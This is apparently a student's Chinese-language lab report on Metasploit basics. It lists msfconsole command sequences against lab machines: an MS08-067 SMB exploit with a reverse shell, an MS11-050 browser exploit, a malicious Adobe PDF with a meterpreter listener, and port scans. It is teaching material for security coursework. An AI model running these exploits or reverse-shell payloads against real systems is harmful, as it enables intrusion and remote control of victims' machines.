2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode

exploit:使用者利用漏洞进行攻击的一个过程,是一个载具。

payload:攻击载荷,如后门等攻击代码。

encode:用来编码,用于伪装

实践过程记录

1.Windows服务渗透攻击——MS08-067安全漏洞

①攻击机:kali ②靶机:windows XP SP3(English)

先检查了一下是否ping通

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf >search ms08-067//使用search命令搜寻有关漏洞MS08_067的相关信息
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)> show payloads//查看可以供我们使用的payload:
msf exploit(ms08_067_netapi)> set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(ms08_067_netapi)> set LHOST 192.168.72.131攻击者ip
msf exploit(ms08_067_netapi)> set LPORT 5319
msf exploit(ms08_067_netapi)> set RHOST 192.168.72.135 //靶机ip
msf exploit(ms08_067_netapi)> set target 0 //自动选择目标系统类型
msf exploit(ms08_067_netapi) > exploit

成功!攻击结果如下:

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

2.浏览器渗透攻击——MS11-050

①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.72.131 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5319 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH rhl19 //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit

成功得到Local ip:

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

用靶机访问http://192.168.72.131:8080/rhl19 ,出现了弹窗警告:

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

尝试修改一下ie浏览器的相关设置,降低其安全等级

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

然而第二次在IE中访问以上网址还是失败

3.针对客户端的攻击Adobe

①攻击机:kali ②靶机:windowsXP Professional sp2 ③Adobe版本:9.3

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.72.131 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5319 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 20155319.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻击

成功生成pdf。

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

由于生成的文件是隐藏文件使用cp命令把其复制到别的目录中去。

将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.72.131 //攻击机ip
msf exploit(handler) > set LPORT 5319 //攻击端口固定
msf exploit(handler) > exploit

再把靶机上打开pdf文件,回连成功。

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

4.Metasploit之——信息收集模块

扫描端口
msf > use auxiliary/scanner/portscan/syn(使用portscan模块)
msf auxiliary(syn) > show options
msf auxiliary(syn) > set RHOSTS 192.168.72.137(目标)
msf auxiliary(syn) > set THREADS 50(线程)
msf auxiliary(syn) > exploit

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

扫描靶机的TCP端口使用情况

输入以下指令:

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(syn) > set RHOSTS 192.168.161.149(目标)
msf auxiliary(syn) > set PORTS 1-5327
msf auxiliary(syn) > run

run开启扫描,可以看到在winxp靶机上所有tcp端口的使用情况

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

上一篇:Qt下QWizard改变next,back等默认按钮的大小及背景


下一篇:实体类的枚举属性--原来支持枚举类型这么简单,没有EF5.0也可以